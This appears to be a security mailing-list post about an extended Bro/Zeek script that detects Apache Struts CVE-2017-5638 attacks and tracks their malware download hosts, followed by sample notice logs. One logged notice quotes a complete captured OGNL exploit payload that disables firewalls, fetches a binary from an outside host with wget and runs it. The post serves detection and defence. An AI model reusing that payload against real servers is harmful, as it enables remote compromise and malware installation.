I extended Scott Campbell's script further, made it more complicated :)
While "HTTP_StrutsAttack" will stop 100% of the recon, there was still miniscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, vulnerable system might still do the wget included in the HTTP request and execute the malware. Since we aren't blocking the malware download IP in wget URL which is almost always a different one then recon IP.
So the extended script also extracts the malware download IP
-
Generate the following notices:
redef enum Notice::Type += { Attempt, MalwareURL, HostileDomainLookup, MalwareURLClick, FileDownload, Compromise, };
-
So now this script will extract the "wget" URL from Attempt and then if the URL has a domain (or cnamed domain) script will further track down the IP addresses of malware host and watch for activity.
-
if wget URL is seen in http, we'd generate a MalwareURLClick notice
-
further notices for FileDownload and Compromise.
-
This script is also clusterized.
I ran it over 24 hours and things look stable with respect to script. I am still sure there might be some lame detection holes. so feel free to modify and let me know too.
Surprisingly, unlike previous times, I don't see huge volume of Struts scanners. I am seeing in range of ~20's a day instead of ~1 000's a day.
Here is example notices:
1489228734.171565 CbVq832QovIwAQddf2 1.24.191.108 65000 131.243.X.Y 80 - - - tcp Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} - 1.24.191.108 131.243.X.Y 80 - worker-5 Notice::ACTION_LOG 3600.000000 F - -- - -
1489237401.399275 C90k4o1Zrn8D7vaXoe 124.117.244.34 49728 128.3.Y.Z 80 - - - tcp Struts::MalwareURL Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;] - 124.117.244.34 128.3.Y.Z 80 - worker-13 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 60.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::Compromise Struts compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240940.206456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 Frx9jZ1JkcrsVtgOkg application/x-executable http://121.42.249.245:1996/tcp/xhx tcp Struts::FileDownload http://121.42.249.245:1996/tcp/xhx http://121.42.249.245:1996/tcp/xhx 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F